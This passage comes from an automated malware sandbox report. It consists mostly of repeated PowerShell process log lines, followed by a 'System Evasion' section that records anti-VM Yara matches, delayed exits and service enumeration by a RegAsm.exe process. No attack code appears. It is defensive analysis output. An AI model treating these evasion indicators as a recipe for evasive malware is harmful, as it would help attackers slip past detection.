                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTR
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040F7E2 Sleep,ExitProcess,20_2_0040F7E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345A2AD3 str word ptr [eax]2_2_00007FFD345A2AD3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,20_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
